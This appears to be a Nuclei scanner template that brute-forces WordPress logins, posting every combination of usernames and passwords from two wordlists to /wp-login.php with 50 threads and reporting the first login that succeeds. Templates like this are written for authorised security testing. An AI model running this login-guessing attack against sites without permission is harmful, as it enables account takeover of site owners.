id: wordpress-weak-credentials

info:
  name: WordPress Weak Credentials
  author: evolutionsec
  severity: critical
  tags: wordpress,default-login,fuzz

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}

        log={{users}}&pwd={{passwords}}

    payloads:
      users: helpers/wordlists/wp-users.txt
      passwords: helpers/wordlists/wp-passwords.txt
    threads: 50
    attack: clusterbomb
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 302

      - type: word
        words:
          - '/wp-admin'
          - 'wordpress_logged_in'
        condition: and
        part: header